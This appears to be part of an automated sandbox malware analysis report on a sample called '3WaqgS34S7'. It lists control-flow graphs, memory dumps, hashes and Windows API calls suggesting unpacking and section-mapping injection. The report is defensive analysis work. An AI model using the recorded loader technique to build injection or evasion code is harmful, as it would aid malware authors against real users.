                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction Fuzzy Hash: 22F062326007196FE7202AB9988DB7A76ECAF89765F100528E752911C2EAB0E8854B61

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 9a003c-9a0047 1 9a0049 0->1 2 9a004c-9a0263 call 9a0a3f call 9a0e0f call 9a0d90 VirtualAlloc 0->2 1->2 17 9a028b-9a0292 2->17 18 9a0265-9a0289 call 9a0a69 2->18 20 9a02a1-9a02b0 17->20 22 9a02ce-9a03c2 VirtualProtect call 9a0cce call 9a0ce7 18->22 20->22 23 9a02b2-9a02cc 20->23 29 9a03d1-9a03e0 22->29 23->20 30 9a0439-9a04b8 VirtualFree 29->30 31 9a03e2-9a0437 call 9a0ce7 29->31 33 9a04be-9a04cd 30->33 34 9a05f4-9a05fe 30->34 31->29 36 9a04d3-9a04dd 33->36 37 9a077f-9a0789 34->37 38 9a0604-9a060d 34->38 36->34 40 9a04e3-9a0505 36->40 41 9a078b-9a07a3 37->41 42 9a07a6-9a07b0 37->42 38->37 43 9a0613-9a0637 38->43 51 9a0517-9a0520 40->51 52 9a0507-9a0515 40->52 41->42 44 9a086e-9a08be LoadLibraryA 42->44 45 9a07b6-9a07cb 42->45 46 9a063e-9a0648 43->46 50 9a08c7-9a08f9 44->50 48 9a07d2-9a07d5 45->48 46->37 49 9a064e-9a065a 46->49 53 9a07d7-9a07e0 48->53 54 9a0824-9a0833 48->54 49->37 55 9a0660-9a066a 49->55 56 9a08fb-9a0901 50->56 57 9a0902-9a091d 50->57 58 9a0526-9a0547 51->58 52->58 59 9a07e2 53->59 60 9a07e4-9a0822 53->60 62 9a0839-9a083c 54->62 61 9a067a-9a0689 55->61 56->57 66 9a054d-9a0550 58->66 59->54 60->48 63 9a068f-9a06b2 61->63 64 9a0750-9a077a 61->64 62->44 65 9a083e-9a0847 62->65 67 9a06ef-9a06fc 63->67 68 9a06b4-9a06ed 63->68 64->46 69 9a084b-9a086c 65->69 70 9a0849 65->70 72 9a05e0-9a05ef 66->72 73 9a0556-9a056b 66->73 74 9a074b 67->74 75 9a06fe-9a0748 67->75 68->67 69->62 70->44 72->36 76 9a056f-9a057a 73->76 77 9a056d 73->77 74->61 75->74 78 9a059b-9a05bb 76->78 79 9a057c-9a0599 76->79 77->72 84 9a05bd-9a05db 78->84 79->84 84->66
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009A024D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_9a0000_3WaqgS34S7.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction ID: 1a343bfe23284ccad9c55bbd4bc15e529e1d6f2517d0bc10554711d8a12dd09a
                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction Fuzzy Hash: 8D527874A00229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB251DB34AE94DF54

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 347 41bd30-41be6e GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00806520), ref: 0041BE0C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00420B08), ref: 0041BE49
                                                                                                                          • VirtualProtect.KERNELBASE(00806364,0080651C,00000040,?), ref: 0041BE69
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741016264.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_40f000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2099061454-0
                                                                                                                          • Opcode ID: b73ac9cb225b51c4fd3d0c368e28526717c9643879deb31053f81edd332f6925
                                                                                                                          • Instruction ID: c95171ec45ed043d524413fa4937ecd1da42087480964d5970ea1364d67dfc6c
                                                                                                                          • Opcode Fuzzy Hash: b73ac9cb225b51c4fd3d0c368e28526717c9643879deb31053f81edd332f6925
                                                                                                                          • Instruction Fuzzy Hash: AB31C024718781CAE361DBA4FC457113EE2BB6A708F44506C9184873FAF3BA5535C76E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 407 9a0e0f-9a0e24 SetErrorMode * 2 408 9a0e2b-9a0e2c 407->408 409 9a0e26 407->409 409->408
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,009A0223,?,?), ref: 009A0E19
                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,009A0223,?,?), ref: 009A0E1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_9a0000_3WaqgS34S7.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction ID: d8bb08acbce6a36e491080eca6a53d73b7e546759d24ac258b579eee218141b3
                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction Fuzzy Hash: 8AD0123114512877DB402A94DC09BCD7B1CDF09B62F108411FB0DD9080C770994046E5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 426 41be70-41bf04 LoadLibraryW
                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNELBASE(00806520,0041C3E3), ref: 0041BEFE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741016264.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_40f000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 0a15243abbb77dc1b97bfc58dabe9b54cb40a51112934ec330926107e8d3d963
                                                                                                                          • Instruction ID: da6e4b38e2470e7c04c496aabc0c9d80adc5fe69ae97a20b7dcc95448944ea40
                                                                                                                          • Opcode Fuzzy Hash: 0a15243abbb77dc1b97bfc58dabe9b54cb40a51112934ec330926107e8d3d963
                                                                                                                          • Instruction Fuzzy Hash: F8F06234729242C6E784DB64FD517112A22FF6EB00F10642A9109CB7F8F6BA8931C71E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 427 401a23-401a66 435 401a69-401a8b call 4012cb Sleep call 401546 427->435 436 401a5d-401a62 427->436 441 401a9a-401ae4 call 4012cb 435->441 442 401a8d-401a95 call 401652 435->442 436->435 442->441
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401A76
                                                                                                                            • Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                            • Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 4a6ab7f2a7f3b1899ba0f8ed2be186294e385831c40161cfa846fbc6bea8b304
                                                                                                                          • Instruction ID: 91b5110070e0c44bf95986206989ec6c2ce5463c47e088f607755108aacdec66
                                                                                                                          • Opcode Fuzzy Hash: 4a6ab7f2a7f3b1899ba0f8ed2be186294e385831c40161cfa846fbc6bea8b304
                                                                                                                          • Instruction Fuzzy Hash: 51018E3530E204E7DB00AA908D81E7B3268EB41354F2041B7B603751F1D53D9A136F2F

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 456 401a2f-401a66 460 401a69-401a8b call 4012cb Sleep call 401546 456->460 461 401a5d-401a62 456->461 466 401a9a-401ae4 call 4012cb 460->466 467 401a8d-401a95 call 401652 460->467 461->460 467->466
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401A76
                                                                                                                            • Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                            • Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: cf572ce4c71145162733ed5eae8eac49e4cb303809c2186d68ef726cba448547
                                                                                                                          • Instruction ID: 0602fc03d50bbbe6fc42af46552b92fff0d4f1b5710024386572b4c46d7e865f
                                                                                                                          • Opcode Fuzzy Hash: cf572ce4c71145162733ed5eae8eac49e4cb303809c2186d68ef726cba448547
                                                                                                                          • Instruction Fuzzy Hash: 5001963670A244EBDB01AA91CD91FAA3378DB44314F2441B7B613751F2D63D9A13AF1B
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009F0649
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_9ed000_3WaqgS34S7.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction ID: 2bf99c3882daa9729d1737dbb5599bc1873dd324188b5b74eda91526bb52720c
                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction Fuzzy Hash: 78113F79A00208EFDB01DF98C985E98BBF5AF48351F058094FA489B362D371EA50DF80
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401A76
                                                                                                                            • Part of subcall function 00401652: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                            • Part of subcall function 00401652: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 396eb1de65484f458ea31e8b5f0b6f3a394b8df51d3751b13c73184ee183ca9d
                                                                                                                          • Instruction ID: cc39f782a2c04dae7e3acb03cf37aaca09712356619e57787449d6207a1c97e1
                                                                                                                          • Opcode Fuzzy Hash: 396eb1de65484f458ea31e8b5f0b6f3a394b8df51d3751b13c73184ee183ca9d
                                                                                                                          • Instruction Fuzzy Hash: 0F01A736745244E7DB00AA948C82EAA3774DB41314F2445B7F613B51E2D63D89136F1B
                                                                                                                          APIs
                                                                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041C1F6
                                                                                                                          • BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041C1FE
                                                                                                                          • GetTimeFormatA.KERNEL32(00000000,00000000,?,0041E30C,?,00000000), ref: 0041C230
                                                                                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 0041C238
                                                                                                                          • GetConsoleAliasExesLengthA.KERNEL32 ref: 0041C23E
                                                                                                                          • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0041C247
                                                                                                                          • GetProcessHandleCount.KERNEL32(00000000,00000000), ref: 0041C24F
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000), ref: 0041C260
                                                                                                                          • GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041C268
                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041C2A1
                                                                                                                          • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 0041C2B0
                                                                                                                          • WriteConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041C2C3
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0041C2CA
                                                                                                                          • GetThreadContext.KERNEL32(00000000,00000000), ref: 0041C2D2
                                                                                                                          • FindAtomW.KERNEL32(00000000), ref: 0041C2D9
                                                                                                                          • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041C2FA
                                                                                                                          • GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 0041C30B
                                                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 0041C313
                                                                                                                          • DisconnectNamedPipe.KERNEL32(?), ref: 0041C322
                                                                                                                          • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041C357
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041C367
                                                                                                                          • OpenFileMappingA.KERNEL32(00000000,00000000,00000000), ref: 0041C379
                                                                                                                          • GlobalAlloc.KERNEL32(00000000,0080651C), ref: 0041C38F
                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0041C433
                                                                                                                          • GetSystemTime.KERNEL32(00000000), ref: 0041C43B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741016264.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_40f000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Console$File$AliasAllocCommGlobalHandleInterlockedModuleOpenSystemThreadTime$AffinityAtomBuildCompareConfigContextCountDecrementDefaultDirectoryDisconnectExchangeExesFindFormatInfoLengthLocaleMappingMaskMoveNameNamedOutputPipeProcessReadStringTimerTypeWaitableWindowsWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2854953312-0
                                                                                                                          • Opcode ID: 87ab2a57b8964d837c89f0e86aa00f89e0aa0f6be5dbe2d1e3f6e6aee76b549b
                                                                                                                          • Instruction ID: c7d6ded2a409469651c71b0e0d077ad49e249c2ac0b9428d9b7779592f733872
                                                                                                                          • Opcode Fuzzy Hash: 87ab2a57b8964d837c89f0e86aa00f89e0aa0f6be5dbe2d1e3f6e6aee76b549b
                                                                                                                          • Instruction Fuzzy Hash: F5A162F2944304AFD314DF64DCC4EAB7BACFB8C308F00992EF54696161D73899558BA9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_9a0000_3WaqgS34S7.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                          • API String ID: 0-2784972518
                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                          • Instruction ID: 7d259b29cefaa938e6d5274d9164a39b39555d15fd7a4ecc33b0ccf99d7aae09
                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                          • Instruction Fuzzy Hash: E6318DB6900609CFDB10CF99C880AAEBBF9FF89324F25404AD441A7311D771EA45CFA4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 7
                                                                                                                          • API String ID: 0-1790921346
                                                                                                                          • Opcode ID: 159ef1356bc4d3fb845f8cadcbfe975d415d6528c97521bf2350dfc02ddf3471
                                                                                                                          • Instruction ID: 48cf68dea9b2a59aff0bd1375967132417f13dea447a5c22fb522c1754ab9dfb
                                                                                                                          • Opcode Fuzzy Hash: 159ef1356bc4d3fb845f8cadcbfe975d415d6528c97521bf2350dfc02ddf3471
                                                                                                                          • Instruction Fuzzy Hash: 0FE1E0764051C2AAE7627A34475C58FFB60E912FE231C4ABBC4803BBC6D2FE5C25964D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2a54127a6e011bd9a6492e942a392b69cb0db3b4479285b61c62e9c2c3931af5
                                                                                                                          • Instruction ID: 31bd91d00bda3e8b880a46313300f3a6432f85cd5b4315b15ba9c8d6998c73ae
                                                                                                                          • Opcode Fuzzy Hash: 2a54127a6e011bd9a6492e942a392b69cb0db3b4479285b61c62e9c2c3931af5
                                                                                                                          • Instruction Fuzzy Hash: 9D318DF959518ABEC3834AF2D847AD17F65A90727030E8096F144AB963F2E2D203D345
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c4b0eba4674c88781440163affe539fc83036850b72e000e994f22a690ddd9f8
                                                                                                                          • Instruction ID: f15b5a85529e3cdc7f12a60dbda4286a3027e8457a7aafd52592071893ae7f15
                                                                                                                          • Opcode Fuzzy Hash: c4b0eba4674c88781440163affe539fc83036850b72e000e994f22a690ddd9f8
                                                                                                                          • Instruction Fuzzy Hash: E9113B62B1D241A7D31796A08D46469BB60EB42390F784C7BD1437E5F3E17B9802968F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_9ed000_3WaqgS34S7.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                          • Instruction ID: c2f9fd2d3d37fa986efd3481549fc921552aca60e2af56b79b9001c0e8cd2f9b
                                                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                          • Instruction Fuzzy Hash: E1115772340104AFDB54DE95DCC5FE673EEEBC9360B298065EA18CB316E679E802C760
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 95d82b58192d50a7ece4916ac66a8a27f0b3f0fc2909334f595ecbe4bb99dafd
                                                                                                                          • Instruction ID: 05b3ec7c0d492939e8eb46500ed78428febff86fdec0977110a008e66ced60c8
                                                                                                                          • Opcode Fuzzy Hash: 95d82b58192d50a7ece4916ac66a8a27f0b3f0fc2909334f595ecbe4bb99dafd
                                                                                                                          • Instruction Fuzzy Hash: CF113B62B0D2419BD3075AA08D065597B60DB52390F384CBBD0437E5F3E17B5802968F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f552beb58d2735dad5636f8d78d2aeb50cd881c8ffdce0193ec9cf3386f8fcc8
                                                                                                                          • Instruction ID: 0d25c83d3b8eb7300d73d6a7a78f19c27339fca208002655f9a92b44dec9f206
                                                                                                                          • Opcode Fuzzy Hash: f552beb58d2735dad5636f8d78d2aeb50cd881c8ffdce0193ec9cf3386f8fcc8
                                                                                                                          • Instruction Fuzzy Hash: 17113D62B19241A7D31796A08D024697B60EB42390F784C77D5437E5F3E17F9802968F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b699132e8fda705e56b4f0f65e0ab04ca49bb388a0a6ba3d09e8b7f405a0f4df
                                                                                                                          • Instruction ID: dbc59df0cf02951115fe61769f6947e1a5e5116725621be0b0e1622a31ca7ba8
                                                                                                                          • Opcode Fuzzy Hash: b699132e8fda705e56b4f0f65e0ab04ca49bb388a0a6ba3d09e8b7f405a0f4df
                                                                                                                          • Instruction Fuzzy Hash: 81016D63F152525BD31B5BA0CD06059FF60E6123A07789DABD041AB4F3D13B98019BCD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 993b6a335257e3c8cc5998be700c3bc7f1dd5ae5108862d4fad162cca8e38f7c
                                                                                                                          • Instruction ID: 80f50c41194a952b2da06f43203cafc51480363042ee59ffb0d482171aeed636
                                                                                                                          • Opcode Fuzzy Hash: 993b6a335257e3c8cc5998be700c3bc7f1dd5ae5108862d4fad162cca8e38f7c
                                                                                                                          • Instruction Fuzzy Hash: 1F016D63B1925257D31B5AA08906099BB60EA02390B789CABD142AA4F3E13B98015B8D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_9a0000_3WaqgS34S7.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                          • Instruction ID: 43d476f9e52ea25558a992f812c5776147770944331b17c4095a204db68389ec
                                                                                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                          • Instruction Fuzzy Hash: BA01A277A016048FDF21DF64C808BAA33E9EBC7316F5544A9D90A9B281E774AD418FD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: be4afb068ff270ef1e21a8d4e7f6584ca575292f68bcb19b5b1fefa61e6e2834
                                                                                                                          • Instruction ID: 2e38c36894ac425607d4ebd065e334a5a0685f06b500dbf4cb2d65a6db31ab9c
                                                                                                                          • Opcode Fuzzy Hash: be4afb068ff270ef1e21a8d4e7f6584ca575292f68bcb19b5b1fefa61e6e2834
                                                                                                                          • Instruction Fuzzy Hash: C6017063F1525157D31B5AE0C902049BF64D6033A07785DA7D151974F3E23B980147CC
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$CreateDuplicateObjectView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1652636561-0
                                                                                                                          • Opcode ID: 7a99cf4006d0a555f1b19d7261e81f119d729c9eda5ea828f42bafe4da3262cb
                                                                                                                          • Instruction ID: 3180e42d2d8fede0b632eaee127032e2f37c429ee0faaffde0d3c4d07bd1809c
                                                                                                                          • Opcode Fuzzy Hash: 7a99cf4006d0a555f1b19d7261e81f119d729c9eda5ea828f42bafe4da3262cb
                                                                                                                          • Instruction Fuzzy Hash: C4E02B73B151429BC31F6A90CD424A9BF64D6033D47B94CB7A102AE8F7D27B5C015B8C

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:6.7%
                                                                                                                          Dynamic/Decrypted Code Coverage:17.5%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:177
                                                                                                                          Total number of Limit Nodes:8
